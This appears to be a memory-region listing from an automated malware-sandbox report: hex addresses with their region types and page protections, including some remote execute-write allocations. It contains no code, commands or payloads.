page read and write
45FD000
remote allocation
page execute and read and write
E9E000
stack
page read and write
250E0000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7040000
trusted library allocation
page read and write
7FF7C18CC000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
53A9000
trusted library allocation
page read and write
2AD41770000
heap
page execute and read and write
250D0000
trusted library allocation
page read and write
2AD41C56000
trusted library allocation
page read and write
4540000
remote allocation
page execute and read and write
7497000
heap
page read and write
23157000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
6F8E000
stack
page read and write
7497000
heap
page read and write
77E0000
direct allocation
page read and write
6A0000
heap
page read and write
7FF7C1B30000
trusted library allocation
page read and write
651000
heap
page read and write
25590000
trusted library allocation
page read and write
2AD41C4E000
trusted library allocation
page read and write
25411000
heap
page read and write
7C5000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
22FF0000
trusted library allocation
page read and write
AE2EEFE000
stack
page read and write
7C0000
trusted library allocation
page read and write
53C9000
trusted library allocation
page read and write
7497000
heap
page read and write
AE2F078000
stack
page read and write
7497000
heap
page read and write
2AD41C52000
trusted library allocation
page read and write
25510000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
529000
heap
page read and write
22FF0000
trusted library allocation
page read and write
8100000
direct allocation
page read and write
25510000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
22FF0000
trusted library allocation
page read and write
2AD3F895000
heap
page read and write
22F20000
heap
page read and write
2AD41115000
heap
page read and write
7497000
heap
page read and write
3286000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
2533F000
heap
page read and write
2309D000
trusted library allocation
page read and write
2AD3F5B0000
heap
page read and write
6C5000
heap
page read and write
25311000
heap
page read and write
22FF0000
trusted library allocation
page read and write
6D71000
heap
page read and write
22FF0000
trusted library allocation
page read and write
CFE000
stack
page read and write
2570C000
stack
page read and write
7497000
heap
page read and write
22B9E000
stack
page read and write
25516000
trusted library allocation
page read and write
7FF7C1813000
trusted library allocation
page execute and read and write
2AD59CD1000
heap
page read and write
7497000
heap
page read and write
23035000
trusted library allocation
page read and write
2AD417B0000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
80C0000
direct allocation
page read and write
2AD3F6AA000
heap
page read and write
25540000
trusted library allocation
page read and write
22DDC000
stack
page read and write
7497000
heap
page read and write
2AD41639000
heap
page read and write
2AD437E2000
trusted library allocation
page read and write
225E0000
direct allocation
page read and write
807C000
stack
page read and write
25368000
heap
page read and write
22CE0000
remote allocation
page read and write
7497000
heap
page read and write
75CA000
heap
page read and write
2532E000
heap
page read and write
2AD41080000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
25590000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
7497000
heap
page read and write
22A2F000
stack
page read and write
7BFC000
heap
page read and write
2AD59C66000
heap
page read and write
BCE000
stack
page read and write
8A40000
direct allocation
page execute and read and write
2AD3F860000
heap
page readonly
2AD41E7F000
trusted library allocation
page read and write
250D0000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
7497000
heap
page read and write
250C0000
trusted library allocation
page read and write
7FF7C18C6000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
6970000
heap
page read and write
225C0000
direct allocation
page read and write
671D000
stack
page read and write
7497000
heap
page read and write
22FF1000
trusted library allocation
page read and write
23020000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
794000
trusted library allocation
page read and write
C3130FD000
stack
page read and write
22E5E000
stack
page read and write
2AD41C43000
trusted library allocation
page read and write
7FF7C1AA0000
trusted library allocation
page read and write
2612E000
stack
page read and write
7497000
heap
page read and write
25590000
trusted library allocation
page read and write
7497000
heap
page read and write
7E30000
trusted library allocation
page read and write
25510000
trusted library allocation
page read and write
7497000
heap
page read and write
23000000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7FF7C1AC0000
trusted library allocation
page read and write
70EC000
stack
page read and write
7497000
heap
page read and write
22FF1000
trusted library allocation
page read and write
3292000
trusted library allocation
page read and write
25F2B000
stack
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
4C8E000
trusted library allocation
page read and write
252C9000
stack
page read and write
260ED000
stack
page read and write
6E20000
trusted library allocation
page read and write
7497000
heap
page read and write
C28000
trusted library allocation
page read and write
7497000
heap
page read and write
644000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7FF7C1A60000
trusted library allocation
page read and write
75B4000
heap
page read and write
7FF7C19C1000
trusted library allocation
page read and write
7497000
heap
page read and write
2AD42023000
trusted library allocation
page read and write
74DE000
stack
page read and write
6DE0000
trusted library allocation
page read and write
25510000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
2AD41632000
heap
page read and write
7497000
heap
page read and write
23030000
trusted library allocation
page read and write
25540000
trusted library allocation
page read and write
7497000
heap
page read and write
25540000
trusted library allocation
page read and write
2AD41C7B000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
2AD43086000
trusted library allocation
page read and write
2AD4184E000
trusted library allocation
page read and write
7497000
heap
page read and write
6D00000
heap
page read and write
25570000
trusted library allocation
page read and write
7497000
heap
page read and write
24079000
trusted library allocation
page read and write
22F30000
trusted library allocation
page read and write
25520000
trusted library allocation
page execute and read and write
2524A000
stack
page read and write
7497000
heap
page read and write
4E0000
heap
page read and write
4D35000
trusted library allocation
page read and write
22FF0000
trusted library allocation
page read and write
7497000
heap
page read and write
56E000
stack
page read and write
2578D000
stack
page read and write
22F1D000
stack
page read and write
7497000
heap
page read and write
23020000
trusted library allocation
page read and write
7FF7C1A80000
trusted library allocation
page read and write
2AD41671000
heap
page read and write
7497000
heap
page read and write
564E000
trusted library allocation
page read and write
7497000
heap
page read and write
25050000
trusted library allocation
page read and write
25590000
trusted library allocation
page read and write
7497000
heap
page read and write
77F0000
heap
page read and write
3264000
trusted library allocation
page read and write
7BA0000
heap
page read and write
7FF7C1AF0000
trusted library allocation
page read and write
84F000
unkown
page read and write
6D51000
heap
page read and write
25570000
trusted library allocation
page read and write
7FF7C1A50000
trusted library allocation
page read and write
7497000
heap
page read and write
7FF7C1A90000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7FF7C1A20000
trusted library allocation
page read and write
22610000
direct allocation
page read and write
2AD59CC7000
heap
page read and write
250E0000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
7497000
heap
page read and write
6DC0000
trusted library allocation
page read and write
7497000
heap
page read and write
520000
heap
page read and write
22620000
direct allocation
page read and write
7497000
heap
page read and write
7490000
heap
page read and write
4407000
trusted library allocation
page read and write
25590000
trusted library allocation
page read and write
6A4000
heap
page read and write
22630000
direct allocation
page read and write
2AD517E1000
trusted library allocation
page read and write
6DD0000
trusted library allocation
page read and write
AE2F33E000
stack
page read and write
3273000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
25510000
trusted library allocation
page read and write
7FF7C182B000
trusted library allocation
page read and write
23092000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
7FF7C1AE0000
trusted library allocation
page read and write
53B1000
trusted library allocation
page read and write
25550000
trusted library allocation
page read and write
7050000
trusted library allocation
page read and write
7B1E000
stack
page read and write
22C3D000
stack
page read and write
2AD41110000
heap
page read and write
CD000
stack
page read and write
6ECE000
stack
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
2AD42039000
trusted library allocation
page read and write
7497000
heap
page read and write
250BA000
stack
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
2AD3F63C000
heap
page read and write
7FF7C19F2000
trusted library allocation
page read and write
7497000
heap
page read and write
326D000
trusted library allocation
page execute and read and write
240B6000
trusted library allocation
page read and write
7497000
heap
page read and write
751E000
stack
page read and write
7497000
heap
page read and write
25590000
trusted library allocation
page read and write
7FF7C19E0000
trusted library allocation
page execute and read and write
8E4D000
stack
page read and write
47E000
unkown
page read and write
AE2E976000
stack
page read and write
22B50000
trusted library allocation
page read and write
2AD4361F000
trusted library allocation
page read and write
75AE000
heap
page read and write
7497000
heap
page read and write
2AD4369A000
trusted library allocation
page read and write
AE2F3BE000
stack
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
6760000
direct allocation
page read and write
7B80000
trusted library allocation
page execute and read and write
7FF7C19D0000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
7540000
direct allocation
page read and write
250E0000
trusted library allocation
page read and write
7FF7C1A70000
trusted library allocation
page read and write
7497000
heap
page read and write
2AD41D3F000
trusted library allocation
page read and write
7497000
heap
page read and write
2532B000
heap
page read and write
250D0000
trusted library allocation
page read and write
6FCE000
stack
page read and write
23130000
trusted library allocation
page read and write
2AD59CF9000
heap
page read and write
77F7000
heap
page read and write
7497000
heap
page read and write
7558000
heap
page read and write
2AD59C5D000
heap
page read and write
7497000
heap
page read and write
2AD3F69C000
heap
page read and write
7497000
heap
page read and write
7E0000
heap
page read and write
25336000
heap
page read and write
67D0000
direct allocation
page read and write
216C58C0000
heap
page read and write
7497000
heap
page read and write
7FF7C1B00000
trusted library allocation
page read and write
AE2EE3F000
stack
page read and write
250D0000
trusted library allocation
page read and write
7497000
heap
page read and write
22FF0000
trusted library allocation
page read and write
2AD435B2000
trusted library allocation
page read and write
7FF7C1B70000
trusted library allocation
page read and write
2AD3F6A6000
heap
page read and write
22C7E000
stack
page read and write
7497000
heap
page read and write
2AD597C0000
heap
page read and write
25315000
heap
page read and write
7080000
trusted library allocation
page read and write
7497000
heap
page read and write
22FF9000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
2AD43577000
trusted library allocation
page read and write
7497000
heap
page read and write
25860000
trusted library allocation
page read and write
7550000
heap
page read and write
7480000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
B2FD000
direct allocation
page execute and read and write
3250000
trusted library allocation
page read and write
2AD4357B000
trusted library allocation
page read and write
7497000
heap
page read and write
257CF000
stack
page read and write
7497000
heap
page read and write
2AD3F6EC000
heap
page read and write
2AD59C83000
heap
page read and write
22FF0000
trusted library allocation
page read and write
AE2EF7F000
stack
page read and write
7FF7C1AB0000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
7F5C000
stack
page read and write
2AD59C30000
heap
page read and write
7497000
heap
page read and write
4CB8000
trusted library allocation
page read and write
7497000
heap
page read and write
25510000
trusted library allocation
page read and write
216C55F0000
heap
page read and write
250C0000
trusted library allocation
page read and write
216C5580000
heap
page read and write
22B2C000
stack
page read and write
329B000
trusted library allocation
page execute and read and write
2AD3F607000
heap
page read and write
7497000
heap
page read and write
6E40000
trusted library allocation
page read and write
22D90000
direct allocation
page read and write
770000
trusted library section
page read and write
7497000
heap
page read and write
63FD000
remote allocation
page execute and read and write
AE2FF8B000
stack
page read and write
2AD42001000
trusted library allocation
page read and write
2AD42A5D000
trusted library allocation
page read and write
7FF7C1930000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
7497000
heap
page read and write
25540000
trusted library allocation
page read and write
7497000
heap
page read and write
6960000
heap
page read and write
4CE000
stack
page read and write
2315D000
trusted library allocation
page read and write
75B9000
heap
page read and write
7497000
heap
page read and write
8E8E000
stack
page read and write
7497000
heap
page read and write
7613000
heap
page read and write
AE2EC7E000
stack
page read and write
764B000
heap
page read and write
61D000
heap
page read and write
7B60000
heap
page read and write
7497000
heap
page read and write
2AD517CF000
trusted library allocation
page read and write
23010000
trusted library allocation
page read and write
7497000
heap
page read and write
25050000
trusted library allocation
page read and write
7010000
trusted library allocation
page read and write
7C2000
trusted library allocation
page read and write
7FF7C1B80000
trusted library allocation
page read and write
7497000
heap
page read and write
6E48000
trusted library allocation
page read and write
25410000
heap
page read and write
C10000
heap
page readonly
8080000
trusted library allocation
page read and write
2AD3F6A0000
heap
page read and write
7FF7C1812000
trusted library allocation
page read and write
22FF0000
trusted library allocation
page read and write
7497000
heap
page read and write
6790000
direct allocation
page read and write
2AD435A0000
trusted library allocation
page read and write
2AD3F820000
trusted library allocation
page read and write
6DC7000
trusted library allocation
page read and write
7497000
heap
page read and write
CB8000
heap
page read and write
2AD43598000
trusted library allocation
page read and write
7497000
heap
page read and write
7FF7C1810000
trusted library allocation
page read and write
59FD000
remote allocation
page execute and read and write
230DA000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
2534A000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
24051000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
7497000
heap
page read and write
7FF7C1B20000
trusted library allocation
page read and write
5AE000
stack
page read and write
7497000
heap
page read and write
2AD41290000
heap
page read and write
7497000
heap
page read and write
80F0000
direct allocation
page read and write
250E0000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
C60000
heap
page read and write
6770000
direct allocation
page read and write
7A0000
trusted library allocation
page read and write
7F1C000
stack
page read and write
3270000
trusted library allocation
page read and write
75C0000
heap
page read and write
689E000
stack
page read and write
7020000
trusted library allocation
page read and write
2AD3F870000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
225A0000
direct allocation
page read and write
AE2F136000
stack
page read and write
7AB0000
trusted library allocation
page read and write
2AD4360E000
trusted library allocation
page read and write
7497000
heap
page read and write
4C11000
trusted library allocation
page read and write
2532C000
heap
page read and write
6E00000
trusted library allocation
page read and write
225F0000
direct allocation
page read and write
25510000
trusted library allocation
page read and write
23020000
trusted library allocation
page read and write
8AFD000
direct allocation
page execute and read and write
AE2F239000
stack
page read and write
764B000
heap
page read and write
7497000
heap
page read and write
22FE0000
trusted library allocation
page read and write
6DF0000
trusted library allocation
page read and write
22FF1000
trusted library allocation
page read and write
6D63000
heap
page read and write
AE2FF0D000
stack
page read and write
6B1E000
stack
page read and write
2315B000
trusted library allocation
page read and write
7497000
heap
page read and write
49B2000
trusted library allocation
page read and write
22FF5000
trusted library allocation
page read and write
3290000
trusted library allocation
page read and write
2AD41777000
heap
page execute and read and write
7FF7C1814000
trusted library allocation
page read and write
7BA000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
250D0000
trusted library allocation
page read and write
7497000
heap
page read and write
2AD41691000
heap
page read and write
7497000
heap
page read and write
2AD3F5FD000
heap
page read and write
250D0000
trusted library allocation
page read and write
2AD435CC000
trusted library allocation
page read and write
22F27000
heap
page read and write
7497000
heap
page read and write
4D0B000
trusted library allocation
page read and write
7497000
heap
page read and write
7BEC000
heap
page read and write
16C000
stack
page read and write
2AD42050000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
7E20000
trusted library allocation
page read and write
7497000
heap
page read and write
25F6C000
stack
page read and write
22AED000
stack
page read and write
250E0000
trusted library allocation
page read and write
25510000
trusted library allocation
page read and write
25411000
heap
page read and write
22CE0000
remote allocation
page read and write
250E0000
trusted library allocation
page read and write
22600000
direct allocation
page read and write
7497000
heap
page read and write
AE2EDFE000
stack
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7B5E000
stack
page read and write
2AD41C3A000
trusted library allocation
page read and write
2AD435B4000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
70A0000
trusted library allocation
page read and write
25FAE000
stack
page read and write
7497000
heap
page read and write
25311000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
216C56F0000
heap
page read and write
2532E000
heap
page read and write
25510000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
2AD416C0000
heap
page read and write
6DFD000
remote allocation
page execute and read and write
25590000
heap
page read and write
22FF1000
trusted library allocation
page read and write
7497000
heap
page read and write
79D000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
22FF0000
trusted library allocation
page read and write
2AD4360A000
trusted library allocation
page read and write
AE2F1B7000
stack
page read and write
2AD517C1000
trusted library allocation
page read and write
D8F000
stack
page read and write
2AD3F540000
heap
page read and write
6F0B000
stack
page read and write
250E0000
trusted library allocation
page read and write
2520C000
stack
page read and write
6B91000
heap
page read and write
2AD4205D000
trusted library allocation
page read and write
7FF7C18D0000
trusted library allocation
page execute and read and write
7FF7C1820000
trusted library allocation
page read and write
22FF0000
trusted library allocation
page read and write
7070000
trusted library allocation
page read and write
25057000
trusted library allocation
page read and write
420000
heap
page read and write
AE2EFFC000
stack
page read and write
500000
heap
page read and write
AE2F43E000
stack
page read and write
7DF4EE540000
trusted library allocation
page execute and read and write
6E60000
trusted library allocation
page read and write
80E0000
direct allocation
page read and write
7497000
heap
page read and write
252FD000
trusted library allocation
page read and write
803E000
stack
page read and write
2AD3F6E6000
heap
page read and write
2AD41CB9000
trusted library allocation
page read and write
7618000
heap
page read and write
216C55F8000
heap
page read and write
25550000
trusted library allocation
page read and write
7497000
heap
page read and write
22F38000
trusted library allocation
page read and write
2AD41750000
heap
page execute and read and write
7090000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
7BC8000
heap
page read and write
7497000
heap
page read and write
22FF0000
trusted library allocation
page read and write
5EE000
stack
page read and write
22BDF000
stack
page read and write
7FF0000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
7497000
heap
page read and write
25EAD000
stack
page read and write
1A8000
stack
page read and write
252EA000
trusted library allocation
page read and write
7497000
heap
page read and write
6780000
direct allocation
page read and write
2AD3F5F0000
heap
page read and write
250E0000
trusted library allocation
page read and write
2AD3F570000
heap
page read and write
4998000
trusted library allocation
page read and write
75C5000
heap
page read and write
22E9E000
stack
page read and write
7FF7C1A10000
trusted library allocation
page read and write
7497000
heap
page read and write
7F0A0000
trusted library allocation
page execute and read and write
2AD41D15000
trusted library allocation
page read and write
7A80000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7F2E0000
trusted library allocation
page execute and read and write
65C000
heap
page read and write
7AA0000
trusted library allocation
page read and write
2574D000
stack
page read and write
2AD59C4C000
heap
page read and write
74F000
stack
page read and write
7497000
heap
page read and write
22BE0000
heap
page read and write
4C3B000
trusted library allocation
page read and write
430000
heap
page read and write
25510000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
7A9000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
25850000
trusted library allocation
page read and write
22D80000
direct allocation
page read and write
23090000
trusted library allocation
page read and write
7FF7C1B60000
trusted library allocation
page read and write
251C8000
stack
page read and write
2AD59D45000
heap
page read and write
7497000
heap
page read and write
225B0000
direct allocation
page read and write
2AD3F550000
heap
page read and write
7FF7C1A40000
trusted library allocation
page read and write
8090000
trusted library allocation
page execute and read and write
22FF1000
trusted library allocation
page read and write
750000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
230D8000
trusted library allocation
page read and write
AE2E9FE000
stack
page read and write
E5E000
stack
page read and write
7591000
heap
page read and write
7497000
heap
page read and write
2528C000
stack
page read and write
73A0000
heap
page read and write
250C0000
trusted library allocation
page read and write
EF5000
heap
page execute and read and write
25310000
heap
page read and write
53A1000
trusted library allocation
page read and write
43A1000
trusted library allocation
page read and write
2AD3F6E8000
heap
page read and write
3263000
trusted library allocation
page execute and read and write
E1F000
stack
page read and write
7497000
heap
page read and write
7BE4000
heap
page read and write
23020000
trusted library allocation
page read and write
6D90000
trusted library allocation
page read and write
25570000
trusted library allocation
page read and write
6C90000
heap
page read and write
7497000
heap
page read and write
4FFD000
remote allocation
page execute and read and write
6E80000
trusted library allocation
page read and write
700D000
stack
page read and write
C3131FF000
unkown
page read and write
250E0000
trusted library allocation
page read and write
C0E000
stack
page read and write
7BB0000
heap
page read and write
AE2FE8F000
stack
page read and write
2AD4169E000
heap
page read and write
2AD41C66000
trusted library allocation
page read and write
7FF7C18C0000
trusted library allocation
page read and write
44FC000
trusted library allocation
page read and write
3297000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
7497000
heap
page read and write
2AD597E1000
heap
page read and write
2AD4358D000
trusted library allocation
page read and write
7497000
heap
page read and write
790000
trusted library allocation
page read and write
7497000
heap
page read and write
23040000
heap
page execute and read and write
7497000
heap
page read and write
7FF7C1AD0000
trusted library allocation
page read and write
C40000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
610000
heap
page read and write
225D0000
direct allocation
page read and write
7497000
heap
page read and write
6D60000
heap
page read and write
7497000
heap
page read and write
25361000
heap
page read and write
250E0000
trusted library allocation
page read and write
7497000
heap
page read and write
7615000
heap
page read and write
328A000
trusted library allocation
page execute and read and write
650000
heap
page read and write
7497000
heap
page read and write
22E17000
stack
page read and write
2AD43809000
trusted library allocation
page read and write
2532B000
heap
page read and write
7497000
heap
page read and write
67B0000
direct allocation
page read and write
2AD43083000
trusted library allocation
page read and write
22FF0000
trusted library allocation
page read and write
23089000
trusted library allocation
page read and write
7497000
heap
page read and write
250E0000
trusted library allocation
page read and write
6D73000
heap
page read and write
22FD0000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
2AD4163C000
heap
page read and write
780000
trusted library allocation
page read and write
AE3000B000
stack
page read and write
25550000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
6D81000
heap
page read and write
2AD59D26000
heap
page read and write
7497000
heap
page read and write
2AD415E0000
heap
page read and write
2AD41FE8000
trusted library allocation
page read and write
9EFD000
direct allocation
page execute and read and write
250E0000
trusted library allocation
page read and write
7A90000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
252DB000
trusted library allocation
page read and write
2AD51ABA000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7BF8000
heap
page read and write
7497000
heap
page read and write
EF0000
heap
page execute and read and write
6D76000
heap
page read and write
7E05000
trusted library allocation
page read and write
22EDC000
stack
page read and write
7FF7C18F6000
trusted library allocation
page execute and read and write
7F9E000
stack
page read and write
250E0000
trusted library allocation
page read and write
216C55A0000
heap
page read and write
6E70000
trusted library allocation
page read and write
22FF0000
trusted library allocation
page read and write
23030000
trusted library allocation
page read and write
7497000
heap
page read and write
7495000
heap
page read and write
7497000
heap
page read and write
2AD41127000
heap
page read and write
6CA9000
heap
page read and write
252D0000
trusted library allocation
page read and write
7497000
heap
page read and write
94FD000
direct allocation
page execute and read and write
480000
heap
page read and write
67A0000
direct allocation
page read and write
2314E000
trusted library allocation
page read and write
7497000
heap
page read and write
216C58C5000
heap
page read and write
7C22000
heap
page read and write
2AD419ED000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
25590000
trusted library allocation
page read and write
7497000
heap
page read and write
7A77000
stack
page read and write
7497000
heap
page read and write
6CCC000
heap
page read and write
7FF7C1B40000
trusted library allocation
page read and write
6F4E000
stack
page read and write
6E30000
trusted library allocation
page execute and read and write
D90000
heap
page execute and read and write
22D5F000
stack
page read and write
6E50000
heap
page execute and read and write
7497000
heap
page read and write
252F6000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
25EEC000
stack
page read and write
252E2000
trusted library allocation
page read and write
2AD59CB3000
heap
page read and write
4D88000
trusted library allocation
page read and write
2AD4371F000
trusted library allocation
page read and write
2AD3F6BC000
heap
page read and write
255A0000
trusted library allocation
page read and write
7497000
heap
page read and write
75CA000
heap
page read and write
1CE000
stack
page read and write
675B000
stack
page read and write
2AD41070000
heap
page execute and read and write
216C54A0000
heap
page read and write
80B0000
direct allocation
page read and write
25510000
trusted library allocation
page read and write
252DE000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7FF7C1B50000
trusted library allocation
page read and write
23020000
trusted library allocation
page read and write
25070000
heap
page execute and read and write
CAC000
stack
page read and write
AE2F4BB000
stack
page read and write
22D1E000
stack
page read and write
7497000
heap
page read and write
25515000
trusted library allocation
page read and write
7647000
heap
page read and write
7497000
heap
page read and write
2AD59C68000
heap
page read and write
7609000
heap
page read and write
4DB2000
trusted library allocation
page read and write
67C0000
direct allocation
page read and write
2AD3F890000
heap
page read and write
2AD59CF4000
heap
page read and write
7BDB000
heap
page read and write
793000
trusted library allocation
page execute and read and write
25590000
trusted library allocation
page read and write
7497000
heap
page read and write
25510000
trusted library allocation
page read and write
250E0000
heap
page read and write
250E0000
trusted library allocation
page read and write
7497000
heap
page read and write
C50000
trusted library allocation
page read and write
7B70000
heap
page read and write
4BBE000
trusted library allocation
page read and write
25590000
trusted library allocation
page read and write
25510000
trusted library allocation
page read and write
7497000
heap
page read and write
7FF7C181D000
trusted library allocation
page execute and read and write
7497000
heap
page read and write
7497000
heap
page read and write
25E6C000
stack
page read and write
7497000
heap
page read and write
B80000
trusted library allocation
page read and write
7647000
heap
page read and write
7FDC000
stack
page read and write
7B90000
trusted library allocation
page read and write
2AD51AAB000
trusted library allocation
page read and write
94F000
stack
page read and write
7497000
heap
page read and write
7EB000
heap
page read and write
7497000
heap
page read and write
AE2ECFE000
stack
page read and write
C3132FF000
stack
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
2532C000
heap
page read and write
7497000
heap
page read and write
2AD4359C000
trusted library allocation
page read and write
7497000
heap
page read and write
There are 868 hidden memdumps, click here to show them.